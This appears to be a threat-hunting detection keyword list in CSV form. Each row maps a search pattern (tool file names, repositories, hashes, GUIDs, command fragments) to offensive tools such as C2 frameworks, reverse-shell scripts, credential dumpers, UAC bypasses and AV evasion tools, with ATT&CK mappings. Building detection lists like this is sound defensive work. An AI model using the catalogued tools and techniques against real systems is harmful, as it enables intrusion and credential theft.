Access,https://github.com/xan7r/kerberoast,1,1,N/A,N/A,1,71,20,2017-07-22T22:28:12Z,2016-06-08T22:58:45Z -*autotimeline *,offensive_tool_keyword,autotimeliner,Automagically extract forensic timeline from volatile memory dumps.,T1547 - T1057 - T1003,TA0005 - TA0008,N/A,N/A,Forensic Exploitation tools,https://github.com/andreafortuna/autotimeliner,1,0,N/A,N/A,2,119,23,2023-03-17T07:29:34Z,2018-11-12T16:13:32Z -*autotimeline.py*,offensive_tool_keyword,autotimeliner,Automagically extract forensic timeline from volatile memory dumps.,T1547 - T1057 - T1003,TA0005 - TA0008,N/A,N/A,Forensic Exploitation tools,https://github.com/andreafortuna/autotimeliner,1,1,N/A,N/A,2,119,23,2023-03-17T07:29:34Z,2018-11-12T16:13:32Z -*autotimeliner.git*,offensive_tool_keyword,autotimeliner,Automagically extract forensic timeline from volatile memory dumps.,T1547 - T1057 - T1003,TA0005 - TA0008,N/A,N/A,Forensic Exploitation tools,https://github.com/andreafortuna/autotimeliner,1,1,N/A,N/A,2,119,23,2023-03-17T07:29:34Z,2018-11-12T16:13:32Z -*aux/dump_credentials*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*aux/enum_system.rc*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*aux/msf/*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*aux/persistence.rc,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*aux/privilege_escalation.*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*aux/Start-Webserver.ps1*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*auxiliary/crawler*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*auxiliary/sqli/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*av_hips_executables.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*avast_memory_dump.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*avet-master.zip*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*avflagged.exe*,offensive_tool_keyword,darkarmour,Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.,T1055.012 - T1027 - T1564.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/bats3c/darkarmour,1,0,N/A,10,7,644,119,2020-04-13T10:56:23Z,2020-04-06T20:48:20Z -*avrdude -c usbasp -p m328p -U flash:w:avr.hex*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*avred-main.zip*,offensive_tool_keyword,avred,Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.,T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/dobin/avred,1,1,N/A,9,2,172,19,2023-09-30T12:28:42Z,2022-05-19T12:12:34Z -*av-update-urls.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*aW52YWxpZF91c2VyQGNvbnRvc28uY29tOlBhc3N3b3JkMQ*,offensive_tool_keyword,o365enum,Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.,T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002,TA0040 - TA0010 - TA0007,N/A,N/A,Exploitation tools,https://github.com/gremwell/o365enum,1,0,N/A,7,3,212,40,2021-04-23T14:40:52Z,2020-02-18T12:22:50Z -*awesome-cve-poc*,offensive_tool_keyword,POC,list of poc exploitation for nown CVE,T1210 - T1583 - T1586 - T1589 - T1596,TA0002 - TA0011 - TA0007,N/A,N/A,Exploitation tools,https://github.com/qazbnm456/awesome-cve-poc,1,1,N/A,N/A,10,3159,741,2022-01-04T19:07:43Z,2017-02-02T06:43:14Z -*Awesome-Hacking*,offensive_tool_keyword,Awesome-Hacking,A collection of awesome lists for hackers. pentesters & security researchers.,T1566 - T1590 - T1204 - T1210 - T1212 - T1213,TA0002 - TA0003 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/Hack-with-Github/Awesome-Hacking,1,1,N/A,N/A,10,69633,8680,2023-08-08T10:17:21Z,2016-03-30T15:47:10Z -*Awesome-Hacking-Resources*,offensive_tool_keyword,Awesome-Hacking-Resources,A collection of hacking / penetration testing resources to make you better!,T1593 - T1594 - T1595 - T1567,TA0007 - TA0009 - TA0004,N/A,N/A,Exploitation tools,https://github.com/vitalysim/Awesome-Hacking-Resources,1,1,N/A,N/A,10,13936,2049,2022-08-22T09:10:41Z,2017-10-10T19:09:18Z -*awesome-osint*,offensive_tool_keyword,awesome-osint,A curated list of amazingly awesome open source intelligence tools and resources. Open-source intelligence (OSINT) is intelligence collected from publicly available sources. In the intelligence community (IC). the term open refers to overt. publicly available sources (as opposed to covert or clandestine sources),T1593 - T1594 - T1595 - T1567,TA0007 - TA0009 - TA0004,N/A,N/A,Information Gathering,https://github.com/jivoi/awesome-osint,1,1,N/A,N/A,10,14087,2400,2023-09-19T11:25:43Z,2016-11-30T13:26:11Z -*awesome-pentest*,offensive_tool_keyword,awesome-pentest,A collection of awesome penetration testing and offensive cybersecurity resources.,T1200 - T1210 - T1213 - T1583 - T1589,TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/enaqx/awesome-pentest,1,1,N/A,N/A,10,19300,4317,2023-09-19T03:06:47Z,2014-08-03T23:13:53Z -*awesome-pentest-cheat-sheets*,offensive_tool_keyword,awesome-pentest-cheat-sheets,Collection of cheat sheets useful for pentesting,T1583 - T1598 - T1596,TA0001 - TA0008 - TA0043,N/A,N/A,Exploitation tools,https://github.com/coreb1t/awesome-pentest-cheat-sheets,1,0,N/A,N/A,10,3505,755,2023-08-04T12:41:53Z,2016-11-29T00:00:18Z -*awesome-scapy*,offensive_tool_keyword,awesome-scapy,A Python tool and library for low level packet creation and manipulation,T1571 - T1596 - T1567 - T1569,TA0002 - TA0009 - TA0011,N/A,N/A,Sniffing & Spoofing,https://github.com/secdev/awesome-scapy,1,1,N/A,N/A,2,148,29,2023-03-08T23:26:41Z,2020-02-04T12:17:35Z -*awesome-static-analysis*,offensive_tool_keyword,awesome-static-analysis,This is a collection of static analysis tools and code quality checkers,T1064 - T1027 - T1029 - T1518,TA0003 - TA0002 - TA0043,N/A,N/A,Exploitation tools,https://github.com/codefactor-io/awesome-static-analysis,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*awesome-web-security*,offensive_tool_keyword,awesome-web-security,Curated list of Web Security materials and resources.Needless to say. most websites suffer from various types of bugs which may eventually lead to vulnerabilities. Why would this happen so often? There can be many factors involved including misconfiguration. shortage of engineers' security skills. etc. To combat this. here is a curated list of Web Security materials and resources for learning cutting edge penetration techniques. and I highly encourage you to read this article So you want to be a web security researcher? first,T1190 - T1191 - T1192 - T1210 - T1213,TA0002 - TA0003 - TA0007,N/A,N/A,Web Attacks,https://github.com/qazbnm456/awesome-web-security,1,1,N/A,N/A,10,10120,1611,2023-09-07T06:54:29Z,2017-01-29T16:50:21Z -*awesome-windows-domain-hardening*,offensive_tool_keyword,awesome-windows-domain-hardening,A curated list of awesome Security Hardening techniques for Windows with additional links to exploitation tools,T1563 - T1059 - T1547 - T1057 - T1574,TA0002 - TA0008 - TA0003 - TA0007 - TA0011,N/A,N/A,Exploitation tools,https://github.com/PaulSec/awesome-windows-domain-hardening,1,0,N/A,N/A,10,1665,280,2020-01-07T19:56:18Z,2017-02-19T19:20:38Z -*awk_reverse_tcp.py*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*aws configure --profile exegol*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*awsloot.py *,offensive_tool_keyword,AWS-Loot,Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.,T1552,TA0002,N/A,N/A,Exploitation tools,https://github.com/sebastian-mora/AWS-Loot,1,0,N/A,N/A,1,64,14,2020-02-02T00:51:56Z,2020-02-02T00:25:46Z -*axcrypt2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*aydinnyunus/PassDetective*,offensive_tool_keyword,PassDetective,PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets,T1059 - T1059.004 - T1552 - T1552.001,TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/aydinnyunus/PassDetective,1,1,N/A,7,1,51,3,2023-08-16T16:51:15Z,2023-07-22T12:31:57Z -*azfvgayqKwtFApcvyRedpUXculaeCCGA*,offensive_tool_keyword,SetProcessInjection,alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.,T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012,TA0005 - TA0004 - TA0002,N/A,N/A,Defense Evasion,https://github.com/OtterHacker/SetProcessInjection,1,0,N/A,9,1,53,10,2023-10-02T09:23:42Z,2023-10-02T08:21:47Z -*Azure-AccessPermissions.ps1*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,1,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z -*Azure-AccessPermissions-master*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,1,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z -*AzureAD AutoLogon Brute*,offensive_tool_keyword,AzureAD_Autologon_Brute,Brute force attack tool for Azure AD Autologon,T1110 - T1078 - T1114 - T1087,TA0006 - TA0007,N/A,N/A,Network Exploitation tools,https://github.com/nyxgeek/AzureAD_Autologon_Brute,1,0,N/A,N/A,1,96,22,2023-02-17T20:11:27Z,2021-10-01T05:20:25Z -*AzureAD_Autologon_Brute*,offensive_tool_keyword,AzureAD_Autologon_Brute,Brute force attack tool for Azure AD Autologon,T1110 - T1078 - T1114 - T1087,TA0006 - TA0007,N/A,N/A,Network Exploitation tools,https://github.com/nyxgeek/AzureAD_Autologon_Brute,1,1,N/A,N/A,1,96,22,2023-02-17T20:11:27Z,2021-10-01T05:20:25Z -*azuread_decrypt_msol_*.ps1*,offensive_tool_keyword,powershell,method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync,T1003.006,TA0006,N/A,N/A,Credential Access,https://gist.github.com/analyticsearch/7453d22d737e46657eb57c44d5cf4cbb,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*AzureADLateralMovement*,offensive_tool_keyword,AzureADLateralMovement,AzureADLateralMovement allows to build Lateral Movement graph for Azure Active Directory entities - Users. Computers. Groups and Roles. Using the Microsoft Graph API AzureADLateralMovement extracts interesting information and builds json files containing lateral movement graph data compatible with Bloodhound 2.2.0,T1074 - T1075 - T1076,TA0008 - TA0009 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/talmaor/AzureADLateralMovement,1,1,N/A,N/A,2,111,21,2022-12-08T06:44:48Z,2019-06-22T06:13:28Z -*AzureADRecon.ps1*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*AzureC2Relay.zip*,offensive_tool_keyword,AzureC2Relay,AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/Flangvik/AzureC2Relay,1,1,N/A,10,10,198,47,2021-02-15T18:06:38Z,2021-02-14T00:03:52Z -*AzureC2Relay-main*,offensive_tool_keyword,AzureC2Relay,AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/Flangvik/AzureC2Relay,1,1,N/A,10,10,198,47,2021-02-15T18:06:38Z,2021-02-14T00:03:52Z -*AzureHound.ps1*,offensive_tool_keyword,BloodHound,BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment,T1069 - T1482 - T1018 - T1087 - T1027 - T1046,TA0007 - TA0003 - TA0002 - TA0040 - TA0043,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/BloodHound,1,0,N/A,10,10,8799,1624,2023-10-03T06:49:04Z,2016-04-17T18:36:14Z -*azurehound/v2*,offensive_tool_keyword,BloodHound,BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment,T1069 - T1482 - T1018 - T1087 - T1027 - T1046,TA0007 - TA0003 - TA0002 - TA0040 - TA0043,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/BloodHound,1,0,N/A,10,10,8799,1624,2023-10-03T06:49:04Z,2016-04-17T18:36:14Z -*-b bleeding-jumbo*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*b12885f92d7691b2823d2b921b7dda440cbcc4c6aa5a3b7c3e9e6f7af4772397*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*b1b79e79880d60412e41d43b5e9ef936fdb3e66ad85e47fc0e1261ed07322d06*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*b22c6d2722fa9e917746502fd4615d28b9c889d7288fc737315150e0ae40ee6f*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*b23r0/Heroinn*,offensive_tool_keyword,Heroinn,A cross platform C2/post-exploitation framework implementation by Rust.,T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/b23r0/Heroinn,1,1,N/A,10,10,586,223,2022-10-08T07:27:38Z,2015-05-16T14:54:19Z -*b23r0/rsocx*,offensive_tool_keyword,rsocx,A bind/reverse Socks5 proxy server.,T1090.001 - T1090.002 - T1071.001,TA0011 - TA0009 - TA0040,N/A,N/A,C2,https://github.com/b23r0/rsocx,1,1,N/A,10,10,319,146,2022-09-28T08:11:34Z,2015-05-13T04:02:55Z -*b289e30ce698eb0402babc2788ac7022b6a7db161296182e0e13fd021a3bee03*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*b2xtranslator.xls.csproj*,offensive_tool_keyword,Macrome,An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation tools,https://github.com/michaelweber/Macrome,1,1,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -*B374K*index.php*,offensive_tool_keyword,b374k,This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel. connecting using ssh. ftp etc. All actions take place within a web browser,T1021 - T1028 - T1071 - T1105 - T1135,TA0002 - TA0003 - TA0005,N/A,N/A,Web Attacks,https://github.com/b374k/b374k,1,0,N/A,N/A,10,2248,783,2023-07-06T20:23:03Z,2014-01-09T04:43:32Z -*b3rito*yodo*,offensive_tool_keyword,yodo,This tool proves how easy it is to become root via limited sudo permissions. via dirty COW or using Pa(th)zuzu. ,T1068 - T1078 - T1529,TA0004 - TA0008,N/A,N/A,Exploitation tools,https://github.com/b3rito/yodo,1,1,N/A,N/A,3,202,34,2017-02-28T15:38:13Z,2016-11-13T21:02:03Z -*b419f6b7b8d24dc61e7473092a8326720ef54e1f65cc185da0c6e080c9debb94*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*b4ldr/nse-scripts*,greyware_tool_keyword,nmap,Install and update external NSE script for nmap,T1046 - T1059.001 - T1027.002,TA0007 - TA0005,N/A,N/A,Vulnerability Scanner,https://github.com/shadawck/nse-install,1,1,N/A,7,1,3,1,2020-08-28T11:27:08Z,2020-08-24T16:55:55Z -*b4rtik/RedPeanut*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*b4rtik/RedPeanut*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1095 - T1071.004,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*B5627919-4DFB-49C6-AC1B-C757F4B4A103*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,0,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*B5A3FA5B3DA95F6AA7556EE2BC62E5D290F72453105EF88E170174994DDA2650*,offensive_tool_keyword,ADACLScanner,A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .,T1222 - T1069 - T1018,TA0002 - TA0007 - TA0043,N/A,N/A,AD Enumeration,https://github.com/canix1/ADACLScanner,1,0,N/A,7,9,809,151,2023-09-12T21:35:21Z,2017-04-06T12:28:37Z -*B64_ENCODED_PAYLOAD_UUID*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*b64encode*.:::-989-:::.*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*b64payloadgen.sh*,offensive_tool_keyword,POC,exploitation of CVE-2021-4034,T1210,N/A,N/A,N/A,Exploitation tools,https://github.com/luijait/PwnKit-Exploit,1,1,N/A,N/A,1,79,14,2022-02-07T15:42:00Z,2022-01-26T18:01:26Z -*b64stager*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*B651A53C-FAE6-482E-A590-CA3B48B7F384*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,0,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*B67143DE-321D-4034-AC1D-C6BB2D98563F*,offensive_tool_keyword,PrintSpoofer,Abusing Impersonation Privileges on Windows 10 and Server 2019,T1548.002 - T1055.001 - T1055.002,TA0005 - TA0003 - TA0004,N/A,N/A,Privilege 